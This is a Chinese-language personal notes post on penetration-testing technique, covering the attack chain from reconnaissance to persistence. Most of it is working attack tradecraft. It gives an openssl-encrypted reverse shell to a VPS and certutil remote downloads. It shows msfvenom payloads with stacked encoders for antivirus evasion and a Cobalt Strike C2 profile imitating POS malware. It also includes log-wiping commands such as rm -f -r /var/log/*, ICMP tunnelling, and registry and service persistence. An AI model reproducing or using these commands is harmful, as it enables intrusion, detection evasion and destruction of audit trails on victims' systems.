個人滲透技巧匯總筆記

前言

首先我們拿到一個站不能心急，凡事三思而行 跑得太快是會滑倒的

當我們獲得目標的時候不要急著用掃描器，這樣會不僅會影響服務器的速度還會在對方的服務器日志生成大量的記錄，什么站能掃什么站不能掃，心里一定要有點 b 數，不然可能等待的就是不一樣的結果了。如果手工測試無果后再用代理手法掃描網站，必要的時候設置二級代理。當然！！！！什么站能掃什么站不能掃，心里一定要有點 b 數！小提示：在使用 proxychains 的時候，程序或者終端選項盡量不要設置任何協議的代理, 否則可能會打亂這個代理回路出現網絡錯誤。

淺藍的滲透測試導圖以及小工具

這里有一個更加詳細的導圖，可以做一個大致的方向參考，跟著方向逐一測試, 期間也可以鞏固基礎。地址在這 https://github.com/iSafeBlue/Mind-Map/releases

首先進行信息收集你獲得的信息越多對自己后面的滲透就越有幫助，whois，旁站子域，服務器操作系統版本，web 中間件以及 waf 與 cdn，通過 google 與 github 看看是否存在已知的漏洞這樣有助于快速的獲得權限，端口掃描并判斷服務漏洞加以利用，目錄的 fuzz，弱口令的 fuzz，google hack 進一步探測網站的信息后臺以及敏感信息，撒旦天眼也是不錯的信息工具。這里也推薦一個公眾號：酒仙橋六號補丁

一. 時刻關注返回的數據包

漏洞有很多種類型都需要滲透方認證仔細的對每個數據包已經 url 進行驗證，要相信所有的努力都是為成功而付出的。如 XSS,XSRF,sql 注入，代碼執行，命令執行，越權訪問，目錄讀取，任意文件讀取，下載，文件包含，遠程命令執行，弱口令，上傳，編輯器漏洞，暴力破解等

二. fuzz 的藝術

https://www.freebuf.com/vuls/221129.html

三. Webbypass

linux 反彈 shell：

1）VPS 上生成 ssl 證書的公鑰/私鑰對：openssl req -x509 -newkey rsa:4096 -keyout key.pem -out cert.pem -days 365 -nodes2）VPS 監聽反彈 shell：openssl s_server -quiet -key key.pem -cert cert.pem -port 803）目標上回連 shell：mkfifo /tmp/s; /bin/bash -i < /tmp/s 2>&1 | openssl s_client -quiet -connect :1024 > /tmp/s; rm /tmp/s VPS 上已獲取加密的 getshell 了。

winodws 桌面：TeamViewerQS 單文件

windows 下載文件；

certutil -urlcache -split -f https://raw.githubusercontent.com/backlion/demo/master/CVE-2017-11882-v1.py test.py

腳本反彈內網：reGeorg

waf：中國蟻劍客戶端，冰蝎與內存馬，反復嘗試使用編碼字節繞過

四. 提權與權限維持

首先通過檢查目標服務器的進程與可利用服務以及漏洞

ssl 加密 payload

###生成證書并寫入文件openssl req -new -newkey rsa:4096 -days 365 -nodes -x509 -keyout rsaprivate.key -out servercertificate.crt cat rsaprivate.key servercertificate.crt >my.pem###生成payloadmsfvenom -p windows/meterpreter/reverse_winhttps LHOST=39.97.167.211 LPORT=6667 --platform windows -a x86 HandLerSSLCert= ./my.pem StagerVerifySSLCert=true -s 42 --smallest -e x86/shikata_ga_nai -i 9 -f raw| msfvenom --platform windows -a x86 -e x86/countdown -i 8 -f raw | msfvenom --platform windows -a x86 -e x86/call4_dword_xor -i 6 -b "\x00\x0a\x0d" -f raw > /home/xskali/kali/Shecodject/output/shellcode.raw ###監聽msfconsole -q -x 'use exploit/multi/handler;set ExitOnSession false;set PAYLOAD windows/meterpreter/reverse_winhttps;set LHOST 192.168.129.128; set LPORT 4445; set HandlerSslCert /home/xskali/kali/Shecodject/output/my.pem;set StagerVerifySSLCert true; set SessionCommunicationTimeout 600 ;set autorunscript post/windows/manage/migrate; run -j -Z'

老牌工具 Cobaltstrike+Profiles

上云和隱藏流量參考 free 教程

keytool -genkey -alias tryblog -keyalg RSA -validity 36500 -keystore tryblog.store

2.C2.profile 文件編輯

set sample_name "tryblog POS Malware"; set sleeptime "5000"; # use a ~30s delay between callbacksset jitter  "10";  # throw in a 10% jitter set useragent "Mozilla/5.0 (Windows NT 6.1; rv:24.0) Gecko/20100101 Firefox/24.0"; #設置證書，注意以下內容得和你之前生成的證書一樣https-certificate {  set CN   "TRY";  set O    "TRY";   set C    "TRY";  set L    "TRY";  set OU   "TRY";   set ST   "TRY";  set validity "365";}#設置，修改成你的證書名稱和證書密碼code-signer{  set keystore "tryblog.store";  set password "tryblog";  set alias "tryblog";} #指定DNS beacon不用的時候指定到IP地址set dns_idle "8.8.4.4"; #每個單獨DNS請求前強制睡眠時間set dns_sleep "0"; #通過DNS上載數據時主機名的最大長度[0-255]set maxdns  "235"; http-post {  set uri "/windebug/updcheck.php /aircanada/dark.php /aero2/fly.php /windowsxp/updcheck.php /hello/flash.php";  client {    header "Accept" "text/plain";    header "Accept-Language" "en-us";    header "Accept-Encoding" "text/plain";    header "Content-Type" "application/x-www-form-urltrytryd";    id {      netbios;      parameter "id";    }    output {      base64;      prepend "&op=1&id=vxeykS&ui=Josh @ PC&wv=11&gr=backoff&bv=1.55&data=";      print;    }  }  server {    output {      print;    }  }} http-get {  set uri "/updates";  client {    metadata {      netbiosu;      prepend "user=";      header "Cookie";    }  }  server {    header "Content-Type" "text/plain";    output {      base64;      print;    }  }}
./c2lint C2.profile./teamserver ip:prot ./C2.profile java -Dfile.encoding=UTF-8 -javaagent:CobaltStrikeCN.jar -XX:ParallelGCThreads=4 -XX:+AggressiveHeap -XX:+UseParallelGC -jar cobaltstrike.jar

免殺遠控整理（來自 Tide 團隊)

項目地址:https://github.com/QChiLan/BypassAntiVirus

windows 下的免殺生成（順序從上到下依次混淆）

如果需要捆綁正常軟件運行使用 shellter，如不能過免殺，再分步測試以下操作。cs 文件編碼混淆用 AVIATOR 生成。測試可以再用 python 再當前目錄打開一個 web 服務器:

python3 -m http.server 8080

1.Lime-Crypter 注入線程

2.DeepSeaOBFuscator 封裝

3.CryptoObfuscator 混淆

4.https 證書修改

5.base64prionx 混淆

6.themida 加殼

7.https 證書修改

8.viper(在線 msf 處理平臺可加特征和簽名很方便)

Veil

Veil 是一種免殺生成工具，用于生成繞過常見防病毒解決方案的 metasploit 有效負載。

一些 payload 加料的技巧

1、通過 ssl 與加殼加密 palyoad（免殺）

2、通過 dns 或套 cdn 傳輸

windows

Exploit 批量掃描：Windows-Exploit-Suggester

漏洞模塊：https://github.com/SecWiki/windows-kernel-exploits

BITS 免殺提權：https://github.com/ohpe/juicy-potato

linux

搜尋配置文件中的明文密碼、sudo 濫用

Exploit 批量掃描：linux-exploit-suggester、linux-exploit-suggester-2

漏洞模塊：https://github.com/SecWiki/linux-kernel-exploits

五、日志清理（細心的安全工程師會更改位置并定時備份后滲透主要還是靠細心）

windows

遇見不能刪除的先停止相關服務：net stop “task scheduler”

系統日志推薦使用工具：clearlog.exe

msf 清理：clearev ，run event_manager -c

防火墻日志路徑：%systemroot%\system32\logfiles\IIS日志路徑：%systemroot%\system32\logfles\windows系統日志：%systemroot%\system32\config\Scheduler服務日志：%systemroot%\schedlgu.txt日志在注冊表的鍵：HKEY_LOCAL_MACHINE\system\CurrentControlSet\Services\Eventlog系統日志：%SystemRoot%\System32\Winevt\Logs\System.evtx安全日志：%SystemRoot%\System32\Winevt\Logs\Security.evtx應用程序日志：%SystemRoot%\System32\Winevt\Logs\Application.evtx

linux（檢索根目錄以及上級目錄是否存在備份）

echo “”> /root/.bash_history

echo “”> /var/run/utmp

/var/log/boot.log：錄了系統在引導過程中發生的事件，就是Linux系統開機自檢過程顯示的信息 /var/log/lastlog ：記錄最后一次用戶成功登陸的時間、登陸IP等信息 /var/log/messages ：記錄Linux操作系統常見的系統和服務錯誤信息 /var/log/secure ：Linux系統安全日志，記錄用戶和工作組變壞情況、用戶登陸認證情況 /var/log/btmp ：記錄Linux登陸失敗的用戶、時間以及遠程IP地址 /var/log/syslog：只記錄警告信息，常常是系統出問題的信息，使用lastlog查看 /var/log/wtmp：該日志文件永久記錄每個用戶登錄、注銷及系統的啟動、停機的事件，使用last命令查看 /var/log/maillog 與郵件相關的日志信息 /var/log/cron 與定時任務相關的日志信息 /var/log/spooler 與UUCP和news設備相關的日志信息 /var/log/auth.log 系統授權信息，包括用戶登錄和使用的權限機制等 (debian) /var/run/utmp：該日志文件記錄有關當前登錄的每個用戶的信息。如 who、w、users、finger等就需要訪問這個文件

web 容器路徑

數據庫通過查詢配置文件定位日志（如 mysql 的配置文件文件 my.inf，tomcat 的配置文件 tomcat-user.xml）

winodws

apche：C:\Program Files\Apache Software Foundation\Apache2.2\htdocs"tomact:C\Program Files\tomcat\lognignx: C\Program Filesginx-1.14.2\logs\

linux

tomcat：/usr/local/tomcat/logs/apche：/usr/local/apache/logs/access_lognignx:/var/log/httpd/error_log rm -f -r /var/log/*

七、后滲透與流量隱匿

frsocks+protoplex + 流量重定向實現端口復用

protoplex 是一個協議復用的工具，比如以下命令可將本地 9999 端口的流量根據協議類型轉到本地的 2333 和 80 端口。用于繞過云主機的 nsg 安全規則。

./frsocks -sockstype fsocks -listen 2333 //創建本地監聽./protoplex --socks5 192.168.154.130:2333 --http 127.0.0.1:80 -b 192.168.154.130:9999 //端口分流，根據協議類型轉到本地的2333和80端口

重定向命令

linux：

sudo iptables -t nat -A PREROUTING -p tcp -m tcp --dport 80 -j REDIRECT --to-ports 9999

windows:

netsh interface portproxy add v4tov4 listenport=80 listen address=192.168.154.129 connectport=9999 connectaddress=192.168.154.129
netsh interface portproxy show all //查看轉發規則netsh interface portproxy reset //清除所有轉發規則

將 IP 流量封裝進 IMCP 的 ping 數據包進行傳輸

工具如下

1、icmptunnel：https://github.com/jamesbarlow/icmptunnel

2、ptunnel：http://www.cs.uit.no/~daniels/PingTunnel/

3、icmpsh：https://github.com/inquisb/icmpsh

4、Powershell-ICMP：https://github.com/api0cradle/Powershell-ICMP

5、復雜的網絡環境可以使用 EarchWorm(ew) 實現多級代理訪問目標主機

后滲透

ps：合理利用后滲透插件可以剩下很多時間，但是要注意痕跡清理。插件有謝公子和梼杌完整版比較常用, Cobaltstrike 推薦插件：謝公子、梼杌、Z1-AggressorScripts、ladong

詳情參考這個：

https://blog.csdn.net/qq_33020901/article/details/98357659

添加開機自啟

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v "Keyname" /t REG_SZ /d "C:\Users\KingXL\1.exe" /f reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v "test" /t REG_SZ /d "C:\Users\KingXL\1.exe" /f
sc create "server power" binpath= "C:\Windows\System32\config.exe"http://設置服務的描述字符串sc description "server power" "description" //設置這個服務為自動啟動sc config "server power" start= auto net start "server power" 啟動服務

八、 一個便捷的 hack 瀏覽器（上火狐開發者版本也不錯）

這里個人做一個備份有需求的自行 google，解釋一下英文的插件功能。

Ajax Interceptor：

可以自定義 ajax 的 json 返回值，前端測試用。

Anti-HoneyPot：

紅隊用，可以檢查網頁中的蜜罐鏈接并提示。

ApiRequest.io Ajax Capture Debugging Tool：

這個是神器！

！

強推，可以測試網頁中任何的 ajax 請求包括跨站 ajax 請求重放，官網提供了只 30 天的請求歷史記錄記得保存重要請求。

Decentraleyes：

可以攔截一些 cdn 和本地的文件跟蹤器

APK Downloader for Google Play Store ：

免 google 框架在線下載應用商店的 app。

Buster Captcha Solver for Humans：

過 goole 驗證碼，有時候識別會比較慢。

Easy WebRTC Block：

干掉 webrtc 的 ip 回顯，避免泄露真實 ip

IP Whois & Flags Chrome & Websites Rating：

自動在后臺測試當前網站 ip 的歸屬地然后以小圖標的形式返回給前臺非常便捷，點擊進去還可以看到 cdn 以及 whois 信息。

NoScript: 慎用，此插件可以強力的攔截網頁上的追蹤器來保護用戶的隱私與真實信息，但是會造成許多網站打開異常。

Identify web technologies ：

可以幫你分析當前網站所使用的網絡技術與框架。

Shodan：

網絡搜索引擎同 fofa 與鐘馗之眼，互聯網設備大殺器

Picture-in-Picture Extension：

畫中畫懸浮窗口看視頻

SourceDetector：

可以再后臺默默的掃描是否有源代碼泄露

HackTools：

方便懶人使用點擊擴展可快速復制 sql，xss，反彈 shell。

FindSomething : 基于瀏覽器插件的被動式信息提取工具